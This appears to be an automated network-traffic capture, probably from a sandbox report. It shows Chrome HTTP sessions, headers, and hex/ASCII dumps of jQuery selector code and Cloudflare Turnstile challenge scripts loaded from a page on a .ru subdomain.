                                                          2025-01-16 04:17:32 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                          2025-01-16 04:17:32 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                          2025-01-16 04:17:32 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.449749104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:32 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:33 UTC471INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:32 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 47521
                                                          Connection: close
                                                          accept-ranges: bytes
                                                          last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                          access-control-allow-origin: *
                                                          cross-origin-resource-policy: cross-origin
                                                          Server: cloudflare
                                                          CF-RAY: 902b4be4efe44401-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:33 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                          Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                          Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                          Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                          Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                          Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                          Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                          Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.449750104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:32 UTC795OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/ HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: iframe
                                                          Referer: https://guf1.xemirax.ru/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:33 UTC1362INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 26635
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                          cross-origin-embedder-policy: require-corp
                                                          cross-origin-opener-policy: same-origin
                                                          cross-origin-resource-policy: cross-origin
                                                          origin-agent-cluster: ?1
                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                          referrer-policy: same-origin
                                                          document-policy: js-profiling
                                                          2025-01-16 04:17:33 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 32 62 34 62 65 35 31 62 61 32 37 63 36 39 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                          Data Ascii: Server: cloudflareCF-RAY: 902b4be51ba27c69-EWRalt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:33 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                          Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                          Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
